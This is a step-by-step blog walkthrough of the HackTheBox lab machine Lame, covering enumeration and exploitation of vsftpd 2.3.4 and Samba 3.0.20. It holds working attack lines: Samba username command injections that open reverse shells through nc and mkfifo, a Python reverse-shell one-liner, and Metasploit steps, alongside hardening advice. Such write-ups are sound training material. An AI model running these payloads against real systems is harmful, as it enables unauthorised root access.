HackTheBox Lame Walkthrough — Step by Step

Spoiler Warning: This post contains a full walkthrough of the retired HackTheBox machine "Lame," including both exploitation paths and the root flag methodology. If you haven't attempted this box yet, I strongly recommend trying it yourself first. You learn more by struggling than by reading.

Machine: Lame Platform: HackTheBox Difficulty: Easy OS: Linux (Ubuntu)

Every penetration tester remembers their first rooted box. For a huge number of people on HackTheBox, that box was Lame. It is one of the original easy-rated machines, and it remains an outstanding teaching tool because it demonstrates two completely different vulnerability classes on a single target. If you are looking for a HackTheBox Lame walkthrough that explains the reasoning behind each step — not commands to copy blindly — this is it.

By the end of this post, you will understand the full attack methodology: reconnaissance, enumeration, exploitation via two distinct paths, and why these vulnerabilities existed in the first place.

Prerequisites

• A HackTheBox account with VPN access (or the Pwnbox)
• Kali Linux or Parrot OS (any pentesting distro works)
• Basic familiarity with the Linux command line
• Nmap installed — if you need a primer, check out my Nmap tutorial for beginners
• OpenVPN connected to HTB labs

Phase 1 — Reconnaissance with Nmap

Every engagement starts with reconnaissance. The goal is to discover what services are running and what versions they expose. Resist the urge to fire off random exploits — enumeration is where boxes are won or lost.

Start with a comprehensive Nmap scan:

nmap -sC -sV -oN lame_scan.txt 10.10.10.3

Here is what each flag does:

• -sC — Runs default NSE scripts (banner grabbing, version detection scripts)
• -sV — Probes open ports to determine service versions
• -oN lame_scan.txt — Saves output in normal format for later reference

Always save your scan results. When you are deep into exploitation, you will want to reference the raw output without re-scanning and generating noise.

Scan Results

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

Four open ports. Two of them should immediately catch your attention: vsftpd 2.3.4 on port 21 and Samba 3.0.20 on port 445. Both of these specific versions have well-documented critical vulnerabilities.

Note: Anonymous FTP login is allowed. In a real engagement, you would check for sensitive files. On Lame, the FTP share is empty, but never skip this step — it costs you 30 seconds and could yield credentials.

Phase 2 — Enumeration

Before jumping to exploitation, I want to understand what I am dealing with. Let me dig deeper into both services.

Enumerating FTP (Port 21)

ftp 10.10.10.3

Log in with anonymous as the username and any string as the password. List the directory contents:

ftp> ls -la
total 0
ftp> exit

Empty. No files, no directories. The anonymous FTP access is a dead end for data, but the version number is the real finding here.

Enumerating Samba (Ports 139/445)

Use smbclient to list available shares:

smbclient -L //10.10.10.3 -N

The -N flag means "no password." You should see:

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh nance!
opt             Disk
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

The tmp share is accessible without credentials. More importantly, the version string confirms Samba 3.0.20. Both services are now confirmed at vulnerable versions. Time to research the exploits.

Path A — vsftpd 2.3.4 Backdoor (CVE-2011-2523)

The Vulnerability

In 2011, someone compromised the vsftpd source code distribution and inserted a backdoor. If a client sends a username containing the characters :) (a smiley face), the server opens a shell listener on port 6200. This is not a buffer overflow or a logic flaw — it is a literal backdoor planted in the source code.

CVE-2011-2523 is a supply-chain attack from before anyone used the term "supply-chain attack."

Exploitation Attempt

You can try this manually. Connect to FTP and send a username with :) appended:

telnet 10.10.10.3 21

USER backdoored:)
PASS anything

Then, in another terminal, check if port 6200 opened:

nmap -p 6200 10.10.10.3

On Lame, you will typically find that port 6200 is filtered or closed. The vsftpd backdoor exists in the binary, but the box's firewall rules (iptables) block the backdoor port. This is an important lesson: a vulnerability existing does not guarantee it is exploitable in every environment. Network controls, firewalls, and segmentation can prevent exploitation even when the software is vulnerable.

You can also try with Metasploit to confirm:

msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.3
run

The exploit will execute but fail to establish a session. The backdoor triggers, but the connection back on port 6200 is blocked. This dead end is educational — it teaches you to always have a second path.

Why This Matters

In real-world pentesting, your first exploit will fail more often than it succeeds. Firewalls, WAFs, EDR, and network segmentation exist precisely to create defense in depth. Do not fixate on one attack vector. This is why thorough enumeration matters — I identified two potentially vulnerable services, and the second one is where we get root.

Path B — Samba 3.0.20 Username Map Script (CVE-2007-2447)

The Vulnerability

Samba 3.0.20 through 3.0.25rc3 contains a command injection vulnerability in the username map script configuration option. When Samba is configured to map usernames through an external script, the username field is passed to /bin/sh without proper sanitization. An attacker can inject shell metacharacters into the username during an SMB session, and the server executes them as root.

This is a textbook command injection: user input flows into a shell command without escaping.

Exploitation with Metasploit

Fire up Metasploit:

msfconsole -q

Search for the Samba module:

search samba 3.0

You will see exploit/multi/samba/usermap_script in the results. Load it:

use exploit/multi/samba/usermap_script
show options

Set the required options:

set RHOSTS 10.10.10.3
set LHOST <YOUR_HTB_VPN_IP>
set LPORT 4444
run

Replace <YOUR_HTB_VPN_IP> with the IP address of your tun0 interface. Find it with ip addr show tun0.

[*] Started reverse TCP handler on <YOUR_HTB_VPN_IP>:4444
[*] Command shell session 1 opened

You should land directly in a root shell. Verify:

whoami
# root
id
# uid=0(root) gid=0(root)

No privilege escalation needed. The Samba service was running as root, so command injection gives you root immediately. This is why the principle of least privilege exists — services should never run as root unless absolutely necessary.

Manual Exploitation (No Metasploit)

Relying on Metasploit is fine for HTB, but OSCP and real-world work demand manual exploitation skills. Here is how to exploit this without Metasploit.

The vulnerability lets you inject commands via the username field. Set up a listener:

nc -lvnp 4444

In another terminal, use smbclient to connect with a crafted username:

smbclient //10.10.10.3/tmp -U './=`nohup nc -e /bin/sh <YOUR_HTB_VPN_IP> 4444`'

When prompted for a password, type anything and press Enter. Check your listener — you should have a shell.

If nc -e is not available on the target, use the mkfifo approach:

smbclient //10.10.10.3/tmp -U './=`nohup mkfifo /tmp/bg; cat /tmp/bg | /bin/sh -i 2>&1 | nc <YOUR_HTB_VPN_IP> 4444 > /tmp/bg`'

Understanding the command injection: the backticks inside the username cause Samba to execute the enclosed command via sh. The nohup ensures the reverse shell persists even if the SMB session terminates.

Grabbing the Flags

With root access, grab both flags:

cat /home/makis/user.txt
cat /root/root.txt

I am not posting the actual flag values — that defeats the purpose. Type the commands yourself and submit them on HackTheBox.

Why These Vulnerabilities Existed

Understanding the why behind vulnerabilities makes you a better security professional.

vsftpd 2.3.4 (CVE-2011-2523): This was a supply-chain compromise. The attacker gained access to the vsftpd distribution server and modified the source code tarball. Anyone who downloaded and compiled vsftpd from the official site during that window got a backdoored binary. This is the same class of attack as the SolarWinds incident — compromise the build pipeline, compromise every downstream user.

Samba 3.0.20 (CVE-2007-2447): This was a code quality issue. The developers passed user-controlled input to a shell command without sanitization. The fix was straightforward — sanitize the username before passing it to the external script. This vulnerability class (OS command injection) is one of the OWASP Top 10 and still appears in modern applications.

Both vulnerabilities reinforce fundamental security principles that I covered in my SSH hardening guide: minimize your attack surface, keep software updated, and run services with the least privilege necessary.

Lessons for Hardening Your Own Servers

If you run servers — and if you are reading this blog, you probably do — Lame teaches concrete lessons:

1. Update your software. Both vulnerabilities were patched years before this box was created. A single apt update && apt upgrade would have prevented both.
2. Firewall everything. Even with the vsftpd backdoor present, iptables rules prevented exploitation. See my guide on hardening a Linux VPS for practical firewall configuration.
3. Run services as non-root. If Samba had run as a low-privilege user, the command injection would have yielded a limited shell, not root.
4. Disable unnecessary services. Why was FTP running alongside SMB? If file sharing was the goal, one protocol is enough.
5. Verify your downloads. The vsftpd backdoor came through a compromised distribution. Check GPG signatures and checksums.

Troubleshooting

Problem: Nmap scan returns "Host seems down." Cause: Your VPN connection to HackTheBox is not active, or the machine has not been spawned. Fix: Run ip addr show tun0 to confirm your VPN IP. If tun0 does not exist, reconnect with sudo openvpn your-lab.ovpn. Make sure you have spawned the Lame machine from the HTB dashboard.

Problem: Metasploit Samba exploit runs but no session opens. Cause: LHOST is set to your local network IP instead of your HTB VPN IP. Fix: Set LHOST to the IP shown on your tun0 interface, not eth0 or wlan0. The target machine can only reach you through the VPN tunnel.

Problem: Manual smbclient command injection does not send a reverse shell. Cause: The nc binary on the target may not support the -e flag (some builds strip it for security). Fix: Use the mkfifo method shown above, or try a Python reverse shell: python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<YOUR_IP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Problem: Reverse shell connects but immediately dies. Cause: The SMB session terminates, killing the child process. Fix: Use nohup before your reverse shell command as shown in the manual exploitation section. This detaches the process from the parent session.

Conclusion

Lame is an "easy" box, but it packs real educational value. You practiced full methodology — recon, enumeration, exploitation — and encountered a failed exploit path before finding one that worked. That failure-then-success pattern mirrors real-world penetration testing more than any box that pops on the first try.

The two vulnerabilities represent fundamentally different attack classes: a supply-chain backdoor and an input validation failure. Both are still relevant in 2026. Supply-chain security has only become more critical, and command injection remains firmly in the OWASP Top 10.

If you are new to CTFs, Lame is an outstanding starting point. Next, try boxes that require privilege escalation — Lame skips that step entirely because Samba runs as root.

For more practical security content, check out my Nmap tutorial for beginners if you want to sharpen your scanning skills, or my hardening guide to learn the defensive side.

If you are building a home lab or practice environment, you will need a VPS. I use Hetzner for all my projects — solid performance, fair pricing, and European data centers with strong privacy standards.